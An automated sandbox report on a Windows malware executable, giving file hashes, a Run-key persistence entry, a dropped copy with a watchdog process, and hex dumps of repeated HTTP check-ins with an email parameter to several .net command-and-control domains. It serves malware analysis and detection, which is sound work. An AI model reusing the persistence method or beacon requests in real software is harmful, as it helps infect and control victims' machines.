Analysis Date2015-05-12 19:13:11

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e647e157ffa45a5dda4b22c8e93272e1 sha1: 53cadd30d7049796a3f251e57eafee5b1afad23b size: 297984
Section.rdata md5: 584758a6e9be147d2e6830b80ddfa018 sha1: 8301ded7a0ab245b6416dd722da39dcd225b7ac6 size: 32768 md5: e30dc4eb166d17f9c7fd0b26b2f95c6c sha1: 22cbc87f02cca432bfd46c992e2eda655205283b size: 96256
Timestamp2014-10-30 09:48:54
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLL Computer Drive Acquisition ➝
C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe

↳ C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.tioeo
Creates FileC:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\spplpfpk.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\yjycltzrggggorh\zhkatlqftf.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 656c6563 74726963   ..Host: electric
0x00000070 (00112)   64657669 63652e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 74726164 65736574   ..Host: tradeset
0x00000070 (00112)   746c652e 6e65740d 0a0d0a0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 73747265 65746465   ..Host: streetde
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62657474 65726465   ..Host: betterde
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 666c6965 72626566   ..Host: flierbef
0x00000070 (00112)   6f72652e 6e65740d 0a0d0a0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6e696768 74737072   ..Host: nightspr
0x00000070 (00112)   696e672e 6e65740d 0a0d0a0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 63617074 61696e73   ..Host: captains
0x00000070 (00112)   75636365 73732e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63616c 69746174 65406461   mail=calitate@da
0x00000020 (00032)   6d696c61 2e726f26 6d657468 6f643d70
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 656c6563 74726963   ..Host: electric
0x00000070 (00112)   73707269 6e672e6e 65740d0a 0d0a

00-+ CC
`EpE E
         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
e? fT/  
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j hh9E
j,hh	E
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
N	TXf$'
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
Rougncei rjsopeo gop hbj jpodeauif scjers bgu mgruncr gjsuek svjihacnan mcoco loojsuz jesabounm uuaif jfje acmjuijef ainhwa pavusoohmr cdug jftu askuofoj aqwumadmm dfh xlgizni pgt bsnuty msn vgjorkwoj eqsc sfisu rpfanuiffe lsb xtye dtacagtdec etuyrezfsu egm dedsutf ksbodb jmbuglcidd aocperuld poqviiens zncadspi jjjarbmi oacyjaurct jaud ciigfiab olssigno tcilag dccucisle cnbuhfup vmag hajr ncmoftpics zcm jsfuslham apdekobe qvp dillosbc pkjannfi ldguso jzxoljuk zppicjse dedbivgcu bntihlmuf ssc tccaoahlej jnsucnf adcg fnoc gnnaibby hfwipplo lwezofamr oxdrupcicu jcc lfn jgeojaivs emgber hntasusn mvlicfcu ljhefhdeb lmpa enbj adm ugzvi cjadeo nnekulg uogluco xlciqpx eboialpe tarjo fmebu rwlad bsyecnumig mxkiuacpci ckj gklombl btjeaaglwi ctfudce pov uunepruo lcpozauh oclj spcall yfgoljahic jjwiiimn jci fgp tpliekmje vgfeonnbu fgmuihjfee uldi vrawanosi jkl xmliy fgifosfci ntutuijmma dymaibv ydsuxlrun jbpogm ifdze yvvobfbufd ztsar drfaen fmj sirt hamlao lerzoep pftug olghefqo rurji nevgutpul mdfucju aqaluvub lrcat ndg zpduavugl ofosmiv nki shxebdupiq jarwelzy jsjul enspef tmkogbc dgcecd epojtaflb arl pcn canmastmaj hkbuqtdu ldkapefje xinihid wsg gcmiznr xnr pdlo cnkawdpus wdfag hldeeuubdp dxrisnt cgjucople giujmijga qigb wvbilij jmbiffdu qbhike esf llecij cfdirpc fwfe lcc pcyo mbemupdk dhpobmnal lpeguqwcom jmeivip bscossbi dfsud begxupnos ddnuuhqupu ucebgeuwvf ecmnobeb vxm laa inetmo irjvuobqs ozvol lbbonbdun vedisa rbsojedm pdduhonge nlg fxjo qepru uajayze kdjegxnu xfnonnr bjpa ifohbefitb gorajaih pxmecgda mkgukslez abrufutfme dmvucld mdqintgu wtluzdxapd xkjajhfaj dce zbimiicdlu gjrumm wrpumib ngexemn cfduefem hcgacn fiauffo pfmaifd ftaluit cctudifel uojcdoot bepogef vlbaiafrti ddjepjt cjcuj jtmoj pvdeczp hzuju vjsegulnu tdyic uznf odcieeino zfve cimfiid mgjagpd vealugaenm uefsjaz fajx qjcogjtec pfs dkpudvk avdilu abgenekyv xmh fetc ilbfuhleo
runtime error 
Runtime Error!
=*	Rx|
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
\x 6&8x
y @%X"
